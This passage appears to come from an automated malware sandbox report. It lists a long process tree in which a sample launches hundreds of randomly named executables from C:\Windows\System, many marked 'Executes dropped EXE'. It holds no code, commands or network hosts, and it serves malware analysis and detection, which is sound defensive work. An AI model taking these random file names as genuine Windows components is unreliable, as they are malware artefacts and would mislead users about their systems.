  PID:4616
- C:\Windows\System\kOHJROv.exe
  C:\Windows\System\kOHJROv.exe
  2⤵
  - Executes dropped EXE
  PID:2992
- C:\Windows\System\AKIJnCN.exe
  C:\Windows\System\AKIJnCN.exe
  2⤵
  - Executes dropped EXE
  PID:4572
- C:\Windows\System\sadmgPo.exe
  C:\Windows\System\sadmgPo.exe
  2⤵
  - Executes dropped EXE
  PID:4636
- C:\Windows\System\CCXUMkE.exe
  C:\Windows\System\CCXUMkE.exe
  2⤵
  - Executes dropped EXE
  PID:2356
- C:\Windows\System\lKmkiMv.exe
  C:\Windows\System\lKmkiMv.exe
  2⤵
  - Executes dropped EXE
  PID:3984
- C:\Windows\System\NFZbtwM.exe
  C:\Windows\System\NFZbtwM.exe
  2⤵
  - Executes dropped EXE
  PID:3460
- C:\Windows\System\jFCNrvx.exe
  C:\Windows\System\jFCNrvx.exe
  2⤵
  - Executes dropped EXE
  PID:2576
- C:\Windows\System\jVVekDd.exe
  C:\Windows\System\jVVekDd.exe
  2⤵
  - Executes dropped EXE
  PID:3744
- C:\Windows\System\WbRzXLz.exe
  C:\Windows\System\WbRzXLz.exe
  2⤵
  - Executes dropped EXE
  PID:4160
- C:\Windows\System\OXtaimO.exe
  C:\Windows\System\OXtaimO.exe
  2⤵
  - Executes dropped EXE
  PID:3248
- C:\Windows\System\ufIVAFP.exe
  C:\Windows\System\ufIVAFP.exe
  2⤵
  - Executes dropped EXE
  PID:3480
- C:\Windows\System\CKkZAow.exe
  C:\Windows\System\CKkZAow.exe
  2⤵
  - Executes dropped EXE
  PID:3424
- C:\Windows\System\PSMoqQE.exe
  C:\Windows\System\PSMoqQE.exe
  2⤵
  - Executes dropped EXE
  PID:756
- C:\Windows\System\KqQKEZg.exe
  C:\Windows\System\KqQKEZg.exe
  2⤵
  - Executes dropped EXE
  PID:4780
- C:\Windows\System\VhEzgZz.exe
  C:\Windows\System\VhEzgZz.exe
  2⤵
  - Executes dropped EXE
  PID:3908
- C:\Windows\System\pRjSGeG.exe
  C:\Windows\System\pRjSGeG.exe
  2⤵
  - Executes dropped EXE
  PID:3228
- C:\Windows\System\ZnWJrwx.exe
  C:\Windows\System\ZnWJrwx.exe
  2⤵
  - Executes dropped EXE
  PID:4128
- C:\Windows\System\bFHEEhl.exe
  C:\Windows\System\bFHEEhl.exe
  2⤵
  - Executes dropped EXE
  PID:4512
- C:\Windows\System\lJdKgPh.exe
  C:\Windows\System\lJdKgPh.exe
  2⤵
  - Executes dropped EXE
  PID:1700
- C:\Windows\System\BDRkbRK.exe
  C:\Windows\System\BDRkbRK.exe
  2⤵
  - Executes dropped EXE
  PID:732
- C:\Windows\System\vepCiLU.exe
  C:\Windows\System\vepCiLU.exe
  2⤵
  - Executes dropped EXE
  PID:2468
- C:\Windows\System\GlsqBFB.exe
  C:\Windows\System\GlsqBFB.exe
  2⤵
  - Executes dropped EXE
  PID:3572
- C:\Windows\System\rHkwrZP.exe
  C:\Windows\System\rHkwrZP.exe
  2⤵
  - Executes dropped EXE
  PID:3396
- C:\Windows\System\QptfdJh.exe
  C:\Windows\System\QptfdJh.exe
  2⤵
  - Executes dropped EXE
  PID:2776
- C:\Windows\System\HdcBfAy.exe
  C:\Windows\System\HdcBfAy.exe
  2⤵
  - Executes dropped EXE
  PID:1952
- C:\Windows\System\TJlbrGv.exe
  C:\Windows\System\TJlbrGv.exe
  2⤵
  - Executes dropped EXE
  PID:1960
- C:\Windows\System\jPrvlBw.exe
  C:\Windows\System\jPrvlBw.exe
  2⤵
  - Executes dropped EXE
  PID:1404
- C:\Windows\System\NIeSEyD.exe
  C:\Windows\System\NIeSEyD.exe
  2⤵
  - Executes dropped EXE
  PID:4472
- C:\Windows\System\LzLSEKF.exe
  C:\Windows\System\LzLSEKF.exe
  2⤵
  - Executes dropped EXE
  PID:3040
- C:\Windows\System\rmocJCq.exe
  C:\Windows\System\rmocJCq.exe
  2⤵
  - Executes dropped EXE
  PID:4844
- C:\Windows\System\WZHrpaq.exe
  C:\Windows\System\WZHrpaq.exe
  2⤵
  - Executes dropped EXE
  PID:1172
- C:\Windows\System\bYUYNKL.exe
  C:\Windows\System\bYUYNKL.exe
  2⤵
  - Executes dropped EXE
  PID:4220
- C:\Windows\System\CMkmqES.exe
  C:\Windows\System\CMkmqES.exe
  2⤵
  - Executes dropped EXE
  PID:856
- C:\Windows\System\xHoTmEt.exe
  C:\Windows\System\xHoTmEt.exe
  2⤵
  - Executes dropped EXE
  PID:2448
- C:\Windows\System\bPBdIlm.exe
  C:\Windows\System\bPBdIlm.exe
  2⤵
  - Executes dropped EXE
  PID:624
- C:\Windows\System\ZvhgHNP.exe
  C:\Windows\System\ZvhgHNP.exe
  2⤵
  - Executes dropped EXE
  PID:3152
- C:\Windows\System\wBscwYx.exe
  C:\Windows\System\wBscwYx.exe
  2⤵
  - Executes dropped EXE
  PID:1368
- C:\Windows\System\EPbFJzG.exe
  C:\Windows\System\EPbFJzG.exe
  2⤵
  - Executes dropped EXE
  PID:3900
- C:\Windows\System\anlOABV.exe
  C:\Windows\System\anlOABV.exe
  2⤵
  - Executes dropped EXE
  PID:4608
- C:\Windows\System\ZaGGVfN.exe
  C:\Windows\System\ZaGGVfN.exe
  2⤵
  - Executes dropped EXE
  PID:3504
- C:\Windows\System\pIgfWFf.exe
  C:\Windows\System\pIgfWFf.exe
  2⤵
  - Executes dropped EXE
  PID:3700
- C:\Windows\System\LAEnmLV.exe
  C:\Windows\System\LAEnmLV.exe
  2⤵
  - Executes dropped EXE
  PID:4628
- C:\Windows\System\fBIIYFH.exe
  C:\Windows\System\fBIIYFH.exe
  2⤵
  - Executes dropped EXE
  PID:2016
- C:\Windows\System\AkLjthH.exe
  C:\Windows\System\AkLjthH.exe
  2⤵
  - Executes dropped EXE
  PID:4944
- C:\Windows\System\FlDEzCI.exe
  C:\Windows\System\FlDEzCI.exe
  2⤵
  - Executes dropped EXE
  PID:2420
- C:\Windows\System\bnacbdo.exe
  C:\Windows\System\bnacbdo.exe
  2⤵
  - Executes dropped EXE
  PID:2736
- C:\Windows\System\HnYUYNQ.exe
  C:\Windows\System\HnYUYNQ.exe
  2⤵
  - Executes dropped EXE
  PID:3120
- C:\Windows\System\aNohYhB.exe
  C:\Windows\System\aNohYhB.exe
  2⤵
  - Executes dropped EXE
  PID:2888
- C:\Windows\System\PxLQODk.exe
  C:\Windows\System\PxLQODk.exe
  2⤵
  - Executes dropped EXE
  PID:4276
- C:\Windows\System\CQkJPna.exe
  C:\Windows\System\CQkJPna.exe
  2⤵
  - Executes dropped EXE
  PID:4560
- C:\Windows\System\lLHdDtR.exe
  C:\Windows\System\lLHdDtR.exe
  2⤵
  - Executes dropped EXE
  PID:3356
- C:\Windows\System\atXNyIk.exe
  C:\Windows\System\atXNyIk.exe
  2⤵
  - Executes dropped EXE
  PID:3644
- C:\Windows\System\mPtoyWZ.exe
  C:\Windows\System\mPtoyWZ.exe
  2⤵
  - Executes dropped EXE
  PID:4788
- C:\Windows\System\jZyBicw.exe
  C:\Windows\System\jZyBicw.exe
  2⤵
  - Executes dropped EXE
  PID:3216
- C:\Windows\System\bxUKcgH.exe
  C:\Windows\System\bxUKcgH.exe
  2⤵
  - Executes dropped EXE
  PID:1852
- C:\Windows\System\OriLwci.exe
  C:\Windows\System\OriLwci.exe
  2⤵
  - Executes dropped EXE
  PID:5008
- C:\Windows\System\SkbBsBi.exe
  C:\Windows\System\SkbBsBi.exe
  2⤵
  - Executes dropped EXE
  PID:4376
- C:\Windows\System\USgVbNb.exe
  C:\Windows\System\USgVbNb.exe
  2⤵
  - Executes dropped EXE
  PID:4140
- C:\Windows\System\DPXYVdJ.exe
  C:\Windows\System\DPXYVdJ.exe
  2⤵
  - Executes dropped EXE
  PID:3252
- C:\Windows\System\edXCPhA.exe
  C:\Windows\System\edXCPhA.exe
  2⤵
  - Executes dropped EXE
  PID:4828
- C:\Windows\System\ZcWHIkU.exe
  C:\Windows\System\ZcWHIkU.exe
  2⤵
  - Executes dropped EXE
  PID:1396
- C:\Windows\System\Nunmrdp.exe
  C:\Windows\System\Nunmrdp.exe
  2⤵
  - Executes dropped EXE
  PID:4440
- C:\Windows\System\HugCemT.exe
  C:\Windows\System\HugCemT.exe
  2⤵
  PID:3952
- C:\Windows\System\BMSZZyb.exe
  C:\Windows\System\BMSZZyb.exe
  2⤵
  PID:3640
- C:\Windows\System\TZYDeMC.exe
  C:\Windows\System\TZYDeMC.exe
  2⤵
  PID:2592
- C:\Windows\System\ekFhopa.exe
  C:\Windows\System\ekFhopa.exe
  2⤵
  PID:1276
- C:\Windows\System\IYttWfB.exe
  C:\Windows\System\IYttWfB.exe
  2⤵
  PID:2572
- C:\Windows\System\noTYqEO.exe
  C:\Windows\System\noTYqEO.exe
  2⤵
  PID:3236
- C:\Windows\System\BXJzZWH.exe
  C:\Windows\System\BXJzZWH.exe
  2⤵
  PID:5100
- C:\Windows\System\EpEDWZY.exe
  C:\Windows\System\EpEDWZY.exe
  2⤵
  PID:1844
- C:\Windows\System\ZemeKmT.exe
  C:\Windows\System\ZemeKmT.exe
  2⤵
  PID:3192
- C:\Windows\System\DLkCHmA.exe
  C:\Windows\System\DLkCHmA.exe
  2⤵
  PID:2292
- C:\Windows\System\PDLyUwn.exe
  C:\Windows\System\PDLyUwn.exe
  2⤵
  PID:232
- C:\Windows\System\lMvMwGA.exe
  C:\Windows\System\lMvMwGA.exe
  2⤵
  PID:4180
- C:\Windows\System\YhgLPXN.exe
  C:\Windows\System\YhgLPXN.exe
  2⤵
  PID:4584
- C:\Windows\System\JHSSeBg.exe
  C:\Windows\System\JHSSeBg.exe
  2⤵
  PID:4492
- C:\Windows\System\rpkSolK.exe
  C:\Windows\System\rpkSolK.exe
  2⤵
  PID:4148
- C:\Windows\System\QEeKvuX.exe
  C:\Windows\System\QEeKvuX.exe
  2⤵
  PID:5136
- C:\Windows\System\DrBjOmz.exe
  C:\Windows\System\DrBjOmz.exe
  2⤵
  PID:5184
- C:\Windows\System\pqnRbES.exe
  C:\Windows\System\pqnRbES.exe
  2⤵
  PID:5228
- C:\Windows\System\OzuRPKf.exe
  C:\Windows\System\OzuRPKf.exe
  2⤵
  PID:5264
- C:\Windows\System\CZPESBa.exe
  C:\Windows\System\CZPESBa.exe
  2⤵
  PID:5288
- C:\Windows\System\RpOkjcL.exe
  C:\Windows\System\RpOkjcL.exe
  2⤵
  PID:5320
- C:\Windows\System\vOCBWUg.exe
  C:\Windows\System\vOCBWUg.exe
  2⤵
  PID:5364
- C:\Windows\System\YturyJL.exe
  C:\Windows\System\YturyJL.exe
  2⤵
  PID:5432
- C:\Windows\System\QgkCGQj.exe
  C:\Windows\System\QgkCGQj.exe
  2⤵
  PID:5448
- C:\Windows\System\VuuTHQb.exe
  C:\Windows\System\VuuTHQb.exe
  2⤵
  PID:5480
- C:\Windows\System\draBKOq.exe
  C:\Windows\System\draBKOq.exe
  2⤵
  PID:5512
- C:\Windows\System\KCkdSMl.exe
  C:\Windows\System\KCkdSMl.exe
  2⤵
  PID:5540
- C:\Windows\System\FUhIPOM.exe
  C:\Windows\System\FUhIPOM.exe
  2⤵
  PID:5572
- C:\Windows\System\ZsVRskg.exe
  C:\Windows\System\ZsVRskg.exe
  2⤵
  PID:5608
- C:\Windows\System\BkCdHPZ.exe
  C:\Windows\System\BkCdHPZ.exe
  2⤵
  PID:5636
- C:\Windows\System\TYZuDgQ.exe
  C:\Windows\System\TYZuDgQ.exe
  2⤵
  PID:5652
- C:\Windows\System\FXKecHP.exe
  C:\Windows\System\FXKecHP.exe
  2⤵
  PID:5692
- C:\Windows\System\eCYaqll.exe
  C:\Windows\System\eCYaqll.exe
  2⤵
  PID:5720
- C:\Windows\System\Rqcxgvk.exe
  C:\Windows\System\Rqcxgvk.exe
  2⤵
  PID:5764
- C:\Windows\System\YMdamVq.exe
  C:\Windows\System\YMdamVq.exe
  2⤵
  PID:5792
- C:\Windows\System\pAlYdcL.exe
  C:\Windows\System\pAlYdcL.exe
  2⤵
  PID:5824
- C:\Windows\System\EAtDQeP.exe
  C:\Windows\System\EAtDQeP.exe
  2⤵
  PID:5860
- C:\Windows\System\UhhkQWN.exe
  C:\Windows\System\UhhkQWN.exe
  2⤵
  PID:5880
- C:\Windows\System\zsRhclg.exe
  C:\Windows\System\zsRhclg.exe
  2⤵
  PID:5920
- C:\Windows\System\pUXWRGA.exe
  C:\Windows\System\pUXWRGA.exe
  2⤵
  PID:5948
- C:\Windows\System\jmPOMbu.exe
  C:\Windows\System\jmPOMbu.exe
  2⤵
  PID:5984
- C:\Windows\System\qobWaao.exe
  C:\Windows\System\qobWaao.exe
  2⤵
  PID:6008
- C:\Windows\System\PwdyJyu.exe
  C:\Windows\System\PwdyJyu.exe
  2⤵
  PID:6044
- C:\Windows\System\YnwEdur.exe
  C:\Windows\System\YnwEdur.exe
  2⤵
  PID:6064
- C:\Windows\System\wYxBFdn.exe
  C:\Windows\System\wYxBFdn.exe
  2⤵
  PID:6096
- C:\Windows\System\rUfvvNu.exe
  C:\Windows\System\rUfvvNu.exe
  2⤵
  PID:6124
- C:\Windows\System\XwjnTJe.exe
  C:\Windows\System\XwjnTJe.exe
  2⤵
  PID:5148
- C:\Windows\System\eZTvQmr.exe
  C:\Windows\System\eZTvQmr.exe
  2⤵
  PID:5212
- C:\Windows\System\DZVUpXU.exe
  C:\Windows\System\DZVUpXU.exe
  2⤵
  PID:5308
- C:\Windows\System\IvpOYtP.exe
  C:\Windows\System\IvpOYtP.exe
  2⤵
  PID:5396
- C:\Windows\System\OnQmhYF.exe
  C:\Windows\System\OnQmhYF.exe
  2⤵
  PID:5416
- C:\Windows\System\btQdHAs.exe
  C:\Windows\System\btQdHAs.exe
  2⤵
  PID:5472
- C:\Windows\System\prqyjeX.exe
  C:\Windows\System\prqyjeX.exe
  2⤵
  PID:2276
- C:\Windows\System\JMzDnlz.exe
  C:\Windows\System\JMzDnlz.exe
  2⤵
  PID:5644
- C:\Windows\System\mIIfzUP.exe
  C:\Windows\System\mIIfzUP.exe
  2⤵
  PID:5704
- C:\Windows\System\gBrKvdr.exe
  C:\Windows\System\gBrKvdr.exe
  2⤵
  PID:5784
- C:\Windows\System\kazUheu.exe
  C:\Windows\System\kazUheu.exe
  2⤵
  PID:5872
- C:\Windows\System\bhNEKJD.exe
  C:\Windows\System\bhNEKJD.exe
  2⤵
  PID:5912
- C:\Windows\System\ZsWJwdl.exe
  C:\Windows\System\ZsWJwdl.exe
  2⤵
  PID:6028
- C:\Windows\System\GMyETYe.exe
  C:\Windows\System\GMyETYe.exe
  2⤵
  PID:6088
- C:\Windows\System\kahEQPW.exe
  C:\Windows\System\kahEQPW.exe
  2⤵
  PID:5132
- C:\Windows\System\SqZQWOJ.exe
  C:\Windows\System\SqZQWOJ.exe
  2⤵
  PID:4816
- C:\Windows\System\LAXoJSg.exe
  C:\Windows\System\LAXoJSg.exe
  2⤵
  PID:4420
- C:\Windows\System\nKoTsOE.exe
  C:\Windows\System\nKoTsOE.exe
  2⤵
  PID:5508
- C:\Windows\System\gnASpij.exe
  C:\Windows\System\gnASpij.exe
  2⤵
  PID:5672
- C:\Windows\System\RbSMEWK.exe
  C:\Windows\System\RbSMEWK.exe
  2⤵
  PID:5756
- C:\Windows\System\jeDAVrA.exe
  C:\Windows\System\jeDAVrA.exe
  2⤵
  PID:2548
- C:\Windows\System\aJhbpFN.exe
  C:\Windows\System\aJhbpFN.exe
  2⤵
  PID:6136
- C:\Windows\System\SkfXAAm.exe
  C:\Windows\System\SkfXAAm.exe
  2⤵
  PID:5440
- C:\Windows\System\kubdpXU.exe
  C:\Windows\System\kubdpXU.exe
  2⤵
  PID:5816
- C:\Windows\System\fIkCJmF.exe
  C:\Windows\System\fIkCJmF.exe
  2⤵
  PID:6084
- C:\Windows\System\PDIqSGk.exe
  C:\Windows\System\PDIqSGk.exe
  2⤵
  PID:5744
- C:\Windows\System\AvtUtfK.exe
  C:\Windows\System\AvtUtfK.exe
  2⤵
  PID:5728
- C:\Windows\System\kAkyVgy.exe
  C:\Windows\System\kAkyVgy.exe
  2⤵
  PID:5736
- C:\Windows\System\ZqCogFm.exe
  C:\Windows\System\ZqCogFm.exe
  2⤵
  PID:6172
- C:\Windows\System\FFYbgQc.exe
  C:\Windows\System\FFYbgQc.exe
  2⤵
  PID:6200
- C:\Windows\System\Hpexzge.exe
  C:\Windows\System\Hpexzge.exe
  2⤵
  PID:6220
- C:\Windows\System\fJQsBol.exe
  C:\Windows\System\fJQsBol.exe
  2⤵
  PID:6244
- C:\Windows\System\OdwiTBV.exe
  C:\Windows\System\OdwiTBV.exe
  2⤵
  PID:6292
- C:\Windows\System\YVVoqTW.exe
  C:\Windows\System\YVVoqTW.exe
  2⤵
  PID:6320
- C:\Windows\System\UIuwZNE.exe
  C:\Windows\System\UIuwZNE.exe
  2⤵
  PID:6356
- C:\Windows\System\pMtTCZL.exe
  C:\Windows\System\pMtTCZL.exe
  2⤵
  PID:6384
- C:\Windows\System\oKkMQJx.exe
  C:\Windows\System\oKkMQJx.exe
  2⤵
  PID:6412
- C:\Windows\System\tyjFWIY.exe
  C:\Windows\System\tyjFWIY.exe
  2⤵
  PID:6448
- C:\Windows\System\igMwEWh.exe
  C:\Windows\System\igMwEWh.exe
  2⤵
  PID:6476
- C:\Windows\System\PdzLlqt.exe
  C:\Windows\System\PdzLlqt.exe
  2⤵
  PID:6492
- C:\Windows\System\HwPgwSg.exe
  C:\Windows\System\HwPgwSg.exe
  2⤵
  PID:6508
- C:\Windows\System\MBiNvmY.exe
  C:\Windows\System\MBiNvmY.exe
  2⤵
  PID:6552
- C:\Windows\System\BxrooOU.exe
  C:\Windows\System\BxrooOU.exe
  2⤵
  PID:6604
- C:\Windows\System\sFAdRkX.exe
  C:\Windows\System\sFAdRkX.exe
  2⤵
  PID:6648
- C:\Windows\System\hpCkjwr.exe
  C:\Windows\System\hpCkjwr.exe
  2⤵
  PID:6696
- C:\Windows\System\vwAtQFO.exe
  C:\Windows\System\vwAtQFO.exe
  2⤵
  PID:6720
- C:\Windows\System\AskjxYj.exe
  C:\Windows\System\AskjxYj.exe
  2⤵
  PID:6760
- C:\Windows\System\oLmKzaR.exe
  C:\Windows\System\oLmKzaR.exe
  2⤵
  PID:6784
- C:\Windows\System\VYeParN.exe
  C:\Windows\System\VYeParN.exe
  2⤵
  PID:6816
- C:\Windows\System\kXVrGRS.exe
  C:\Windows\System\kXVrGRS.exe
  2⤵
  PID:6852
- C:\Windows\System\ZvMibxx.exe
  C:\Windows\System\ZvMibxx.exe
  2⤵
  PID:6872
- C:\Windows\System\YaFNStF.exe
  C:\Windows\System\YaFNStF.exe
  2⤵
  PID:6908
- C:\Windows\System\qfscQCf.exe
  C:\Windows\System\qfscQCf.exe
  2⤵
  PID:6940
- C:\Windows\System\faSSUiv.exe
  C:\Windows\System\faSSUiv.exe
  2⤵
  PID:6976
- C:\Windows\System\uvWYaqU.exe
  C:\Windows\System\uvWYaqU.exe
  2⤵
  PID:6996
- C:\Windows\System\SLMlWlp.exe
  C:\Windows\System\SLMlWlp.exe
  2⤵
  PID:7028
- C:\Windows\System\hzCXJhZ.exe
  C:\Windows\System\hzCXJhZ.exe
  2⤵
  PID:7056
- C:\Windows\System\SPQLEom.exe
  C:\Windows\System\SPQLEom.exe
  2⤵
  PID:7088
- C:\Windows\System\eNIHkDM.exe
  C:\Windows\System\eNIHkDM.exe
  2⤵
  PID:7120
- C:\Windows\System\bYaShYq.exe
  C:\Windows\System\bYaShYq.exe
  2⤵
  PID:7144
- C:\Windows\System\GRjcuva.exe
  C:\Windows\System\GRjcuva.exe
  2⤵
  PID:5460
- C:\Windows\System\kjPCxHq.exe
  C:\Windows\System\kjPCxHq.exe
  2⤵
  PID:6228
- C:\Windows\System\JVQoFZa.exe
  C:\Windows\System\JVQoFZa.exe
  2⤵
  PID:6280
- C:\Windows\System\MXunDKC.exe
  C:\Windows\System\MXunDKC.exe
  2⤵
  PID:6352
- C:\Windows\System\TAjXsND.exe
  C:\Windows\System\TAjXsND.exe
  2⤵
  PID:6396
- C:\Windows\System\SxhpIfK.exe
  C:\Windows\System\SxhpIfK.exe
  2⤵
  PID:6468
- C:\Windows\System\pyWmiDm.exe
  C:\Windows\System\pyWmiDm.exe
  2⤵
  PID:6528
- C:\Windows\System\nGcZuZl.exe
  C:\Windows\System\nGcZuZl.exe
  2⤵
  PID:6636
- C:\Windows\System\GvOKGdF.exe
  C:\Windows\System\GvOKGdF.exe
  2⤵
  PID:6704
- C:\Windows\System\nhDjBTD.exe
  C:\Windows\System\nhDjBTD.exe
  2⤵
  PID:1120
- C:\Windows\System\qkQehAd.exe
  C:\Windows\System\qkQehAd.exe
  2⤵
  PID:6824
- C:\Windows\System\qTUycUc.exe
  C:\Windows\System\qTUycUc.exe
  2⤵
  PID:6868
- C:\Windows\System\opzvkoW.exe
  C:\Windows\System\opzvkoW.exe
  2⤵
  PID:6928
- C:\Windows\System\esRjGFj.exe
  C:\Windows\System\esRjGFj.exe
  2⤵
  PID:7004
- C:\Windows\System\YrSfibe.exe
  C:\Windows\System\YrSfibe.exe
  2⤵
  PID:7068
- C:\Windows\System\ahygDCE.exe
  C:\Windows\System\ahygDCE.exe
  2⤵
  PID:5300
- C:\Windows\System\lWzHHVT.exe
  C:\Windows\System\lWzHHVT.exe
  2⤵
  PID:2212
- C:\Windows\System\nxvQYRA.exe
  C:\Windows\System\nxvQYRA.exe
  2⤵
  PID:6264
- C:\Windows\System\dOWbIdX.exe
  C:\Windows\System\dOWbIdX.exe
  2⤵
  PID:6444
- C:\Windows\System\sjebzQw.exe
  C:\Windows\System\sjebzQw.exe
  2⤵
  PID:6600
- C:\Windows\System\jYkmSaa.exe
  C:\Windows\System\jYkmSaa.exe
  2⤵
  PID:6748
- C:\Windows\System\WhiYnwM.exe
  C:\Windows\System\WhiYnwM.exe
  2⤵
  PID:6860
- C:\Windows\System\cXATNnY.exe
  C:\Windows\System\cXATNnY.exe
  2⤵
  PID:7096
- C:\Windows\System\WMIdZZY.exe
  C:\Windows\System\WMIdZZY.exe
  2⤵
  PID:6256
- C:\Windows\System\zOjYfum.exe
  C:\Windows\System\zOjYfum.exe
  2⤵
  PID:6796
- C:\Windows\System\mzWyKoK.exe
  C:\Windows\System\mzWyKoK.exe
  2⤵
  PID:6684
- C:\Windows\System\kDLgsRm.exe
  C:\Windows\System\kDLgsRm.exe
  2⤵
  PID:7216
- C:\Windows\System\DommBvJ.exe
  C:\Windows\System\DommBvJ.exe
  2⤵
  PID:7244
- C:\Windows\System\sdvbmpt.exe
  C:\Windows\System\sdvbmpt.exe
  2⤵
  PID:7280
- C:\Windows\System\bzWBAeD.exe
  C:\Windows\System\bzWBAeD.exe
  2⤵
  PID:7332
- C:\Windows\System\vUAvKzX.exe
  C:\Windows\System\vUAvKzX.exe
  2⤵
  PID:7384
- C:\Windows\System\eTBplbw.exe
  C:\Windows\System\eTBplbw.exe
  2⤵
  PID:7428
- C:\Windows\System\oeXNLyN.exe
  C:\Windows\System\oeXNLyN.exe
  2⤵
  PID:7456
- C:\Windows\System\ZfZwcMm.exe
  C:\Windows\System\ZfZwcMm.exe
  2⤵
  PID:7488
- C:\Windows\System\qbmyzOe.exe
  C:\Windows\System\qbmyzOe.exe
  2⤵
  PID:7520
- C:\Windows\System\oqlUIdA.exe
  C:\Windows\System\oqlUIdA.exe
  2⤵
  PID:7544
- C:\Windows\System\gEszLnO.exe
  C:\Windows\System\gEszLnO.exe
  2⤵
  PID:7572
- C:\Windows\System\IMmmfog.exe
  C:\Windows\System\IMmmfog.exe
  2⤵
  PID:7604
- C:\Windows\System\XeLGlCy.exe
  C:\Windows\System\XeLGlCy.exe
  2⤵
  PID:7640
- C:\Windows\System\idNQkXH.exe
  C:\Windows\System\idNQkXH.exe
  2⤵
  PID:7684
- C:\Windows\System\yHnWVMD.exe
  C:\Windows\System\yHnWVMD.exe
  2⤵
  PID:7708
- C:\Windows\System\JzijJIZ.exe
  C:\Windows\System\JzijJIZ.exe
  2⤵
  PID:7748
- C:\Windows\System\XcZQrba.exe
  C:\Windows\System\XcZQrba.exe
  2⤵
  PID:7780
- C:\Windows\System\eULChCb.exe
  C:\Windows\System\eULChCb.exe
  2⤵
  PID:7808
- C:\Windows\System\pcHTlxm.exe
  C:\Windows\System\pcHTlxm.exe
  2⤵
  PID:7828
- C:\Windows\System\ElZHOha.exe
  C:\Windows\System\ElZHOha.exe
  2⤵
  PID:7860
- C:\Windows\System\EgYRKyk.exe
  C:\Windows\System\EgYRKyk.exe
  2⤵
  PID:7888
- C:\Windows\System\qIsBXVU.exe
  C:\Windows\System\qIsBXVU.exe
  2⤵
  PID:7920
- C:\Windows\System\NitCnAd.exe
  C:\Windows\System\NitCnAd.exe
  2⤵
  PID:7956
- C:\Windows\System\TXPwBJq.exe
  C:\Windows\System\TXPwBJq.exe
  2⤵
  PID:7980
- C:\Windows\System\IKKwdUR.exe
  C:\Windows\System\IKKwdUR.exe
  2⤵
  PID:8008
- C:\Windows\System\pahDsnu.exe
  C:\Windows\System\pahDsnu.exe
  2⤵
  PID:8044
- C:\Windows\System\fNTdeML.exe
  C:\Windows\System\fNTdeML.exe
  2⤵
  PID:8064
- C:\Windows\System\TUKPCbS.exe
  C:\Windows\System\TUKPCbS.exe
  2⤵
  PID:8092
- C:\Windows\System\SkncFYT.exe
  C:\Windows\System\SkncFYT.exe
  2⤵
  PID:8120
- C:\Windows\System\vxgozzN.exe
  C:\Windows\System\vxgozzN.exe
  2⤵
  PID:8156
- C:\Windows\System\QPVKVvK.exe
  C:\Windows\System\QPVKVvK.exe
  2⤵
  PID:8180
- C:\Windows\System\rUmhoeZ.exe
  C:\Windows\System\rUmhoeZ.exe
  2⤵
  PID:7232
- C:\Windows\System\kAQBAfE.exe
  C:\Windows\System\kAQBAfE.exe
  2⤵
  PID:7324
- C:\Windows\System\jxzUkHa.exe
  C:\Windows\System\jxzUkHa.exe
  2⤵
  PID:7396
- C:\Windows\System\pCDyqOg.exe
  C:\Windows\System\pCDyqOg.exe
  2⤵
  PID:7480
- C:\Windows\System\MYKPyXv.exe
  C:\Windows\System\MYKPyXv.exe
  2⤵
  PID:7564
- C:\Windows\System\kAdtwlL.exe
  C:\Windows\System\kAdtwlL.exe
  2⤵
  PID:7668
- C:\Windows\System\dVypmHU.exe
  C:\Windows\System\dVypmHU.exe
  2⤵
  PID:7736
- C:\Windows\System\MZDZSQN.exe
  C:\Windows\System\MZDZSQN.exe
  2⤵
  PID:7816
- C:\Windows\System\DqqxhSi.exe
  C:\Windows\System\DqqxhSi.exe
  2⤵
  PID:7868
- C:\Windows\System\qwtHohA.exe
  C:\Windows\System\qwtHohA.exe
  2⤵
  PID:6520
- C:\Windows\System\wyulOaj.exe
  C:\Windows\System\wyulOaj.exe
  2⤵
  PID:8000
- C:\Windows\System\SHLRusZ.exe
  C:\Windows\System\SHLRusZ.exe
  2⤵
  PID:8060
- C:\Windows\System\PXsKeUg.exe
  C:\Windows\System\PXsKeUg.exe
  2⤵
  PID:8140
- C:\Windows\System\iIaNJiB.exe
  C:\Windows\System\iIaNJiB.exe
  2⤵
  PID:7180
- C:\Windows\System\GcoAcRv.exe
  C:\Windows\System\GcoAcRv.exe
  2⤵
  PID:7452
- C:\Windows\System\btXOWGx.exe
  C:\Windows\System\btXOWGx.exe
  2⤵
  PID:7652
- C:\Windows\System\tWGRzFc.exe
  C:\Windows\System\tWGRzFc.exe
  2⤵
  PID:7820
- C:\Windows\System\IonBqZa.exe
  C:\Windows\System\IonBqZa.exe
  2⤵
  PID:7972
- C:\Windows\System\WDcJGRT.exe
  C:\Windows\System\WDcJGRT.exe
  2⤵
  PID:8172
- C:\Windows\System\VbtBPmD.exe
  C:\Windows\System\VbtBPmD.exe
  2⤵
  PID:7536
- C:\Windows\System\QIZeBqq.exe
  C:\Windows\System\QIZeBqq.exe
  2⤵
  PID:7948
- C:\Windows\System\SZFbICw.exe
  C:\Windows\System\SZFbICw.exe
  2⤵
  PID:7292
- C:\Windows\System\xcNsOYE.exe
  C:\Windows\System\xcNsOYE.exe
  2⤵
  PID:8104
- C:\Windows\System\lSNJwpd.exe
  C:\Windows\System\lSNJwpd.exe
  2⤵
  PID:8212
- C:\Windows\System\KnYOtFH.exe
  C:\Windows\System\KnYOtFH.exe
  2⤵
  PID:8240
- C:\Windows\System\XpoFgXv.exe
  C:\Windows\System\XpoFgXv.exe
  2⤵
  PID:8272
- C:\Windows\System\xRrXYcs.exe
  C:\Windows\System\xRrXYcs.exe
  2⤵
  PID:8300
- C:\Windows\System\tFJBMll.exe
  C:\Windows\System\tFJBMll.exe
  2⤵
  PID:8332
- C:\Windows\System\StiUdSD.exe
  C:\Windows\System\StiUdSD.exe
  2⤵
  PID:8360
- C:\Windows\System\SMTJVrP.exe
  C:\Windows\System\SMTJVrP.exe
  2⤵
  PID:8388
- C:\Windows\System\XEsmhly.exe
  C:\Windows\System\XEsmhly.exe
  2⤵
  PID:8420
- C:\Windows\System\kHkPfVc.exe
  C:\Windows\System\kHkPfVc.exe
  2⤵
  PID:8448
- C:\Windows\System\ohGNERU.exe
  C:\Windows\System\ohGNERU.exe
  2⤵
  PID:8476
- C:\Windows\System\PTxYuZT.exe
  C:\Windows\System\PTxYuZT.exe
  2⤵
  PID:8504
- C:\Windows\System\ZTFCVJP.exe
  C:\Windows\System\ZTFCVJP.exe
  2⤵
  PID:8532
- C:\Windows\System\MHxZvxK.exe
  C:\Windows\System\MHxZvxK.exe
  2⤵
  PID:8560
- C:\Windows\System\TFtClTC.exe
  C:\Windows\System\TFtClTC.exe
  2⤵
  PID:8592
